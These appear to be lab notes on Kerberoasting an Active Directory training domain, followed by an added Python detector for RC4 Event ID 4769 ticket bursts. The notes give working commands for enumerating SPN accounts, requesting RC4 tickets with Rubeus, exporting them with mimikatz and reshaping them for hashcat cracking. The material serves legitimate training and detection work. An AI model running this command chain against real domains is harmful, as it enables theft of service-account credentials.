- Listing SPN accounts:
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend
- To get a TGS ticket for one user:
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev
Or just -request (no user) works too.
- To import and view all users
Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname
- Exporting all tickets to a CSV file
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation
- Viewing it
cat .\ilfreight_tgs.csv
- Check options
.\Rubeus.exe
- To check stats:
.\Rubeus.exe kerberoast /stats
- To get hashes:
.\Rubeus.exe kerberoast /nowrap /tgtdeleg
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap #admincount=1 selects high-value (protected) accounts
To request RC4-encrypted tickets (etype 23) use /tgtdeleg
- Enumerating SPNs
setspn.exe -Q */*
- Targeting single user:
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"
- Retrieving all tickets
setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
- Extracting tickets from memory using mimikatz:
mimikatz # base64 /out:true
isBase64InterceptInput is false
isBase64InterceptOutput is true
mimikatz # kerberos::list /export
- Now to crack:
echo "<base64 blob>" | tr -d \\n > encoded_file
cat encoded_file | base64 -d > sqldev.kirbi
Run kirbi2john on sqldev.kirbi, then rewrite its output (crack_file) into the hashcat etype 23 format:
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat
Now run sqldev_tgs_hashcat through hashcat
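As an added, defender-side example that is not part of these notes: the RC4 (etype 23) service ticket requests that /tgtdeleg produces are the classic Kerberoasting signal in domain controller Event ID 4769 logs. The script below parses constructed 4769 records (field names follow the event's EventData; the key=value layout, sample accounts and IPs are assumed) and flags any requester that obtains RC4 service tickets for several distinct service accounts within a short window.

```python
# Added example (not from the original notes): flag the RC4 (etype 0x17 / 23)
# Kerberoasting pattern in constructed Event ID 4769 records.  Field names
# follow the event's EventData; the key=value record layout is assumed.
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17                 # etype 23, the "RC4 encrypted" tickets above
WINDOW = timedelta(minutes=5)   # look-back window per requester
THRESHOLD = 3                   # distinct service names before we alert

def parse_4769(line):
    """Parse one constructed 'key=value;...' 4769 record into a dict."""
    rec = dict(kv.split("=", 1) for kv in line.split(";"))
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    rec["TicketEncryptionType"] = int(rec["TicketEncryptionType"], 16)
    return rec

def detect_rc4_roasting(lines, threshold=THRESHOLD, window=WINDOW):
    """Return {requester: sorted service names} for requesters matching the pattern."""
    by_user = defaultdict(list)
    for rec in map(parse_4769, lines):
        svc = rec["ServiceName"]
        # Only RC4 service tickets count; krbtgt and machine accounts ($) are noise
        if rec["TicketEncryptionType"] != RC4_HMAC or svc == "krbtgt" or svc.endswith("$"):
            continue
        by_user[rec["TargetUserName"]].append((rec["ts"], svc))
    hits = {}
    for user, events in by_user.items():
        events.sort()
        for i, (t0, _) in enumerate(events):        # slide the window forward
            spns = {s for t, s in events[i:] if t - t0 <= window}
            if len(spns) >= threshold:
                hits[user] = sorted(spns)
                break
    return hits

# Constructed sample: one account sweeping several service accounts with RC4
# within seconds, one ordinary user making a single AES256 (0x12) request.
SAMPLE_4769 = [
    "ts=2024-05-01T10:00:01;TargetUserName=forend@INLANEFREIGHT.LOCAL;ServiceName=sqldev;TicketEncryptionType=0x17;IpAddress=172.16.5.25",
    "ts=2024-05-01T10:00:02;TargetUserName=forend@INLANEFREIGHT.LOCAL;ServiceName=svc_backup;TicketEncryptionType=0x17;IpAddress=172.16.5.25",
    "ts=2024-05-01T10:00:03;TargetUserName=forend@INLANEFREIGHT.LOCAL;ServiceName=krbtgt;TicketEncryptionType=0x17;IpAddress=172.16.5.25",
    "ts=2024-05-01T10:00:04;TargetUserName=forend@INLANEFREIGHT.LOCAL;ServiceName=svc_web;TicketEncryptionType=0x17;IpAddress=172.16.5.25",
    "ts=2024-05-01T10:01:00;TargetUserName=jdoe@INLANEFREIGHT.LOCAL;ServiceName=sqldev;TicketEncryptionType=0x12;IpAddress=172.16.5.30",
]

if __name__ == "__main__":
    for user, spns in detect_rc4_roasting(SAMPLE_4769).items():
        print(f"possible Kerberoasting by {user}: {spns}")
```

Enforcing AES-only service accounts (so no etype 23 tickets are issued at all) removes the downgrade this rule keys on; tune the threshold and window to the environment's normal ticket volume.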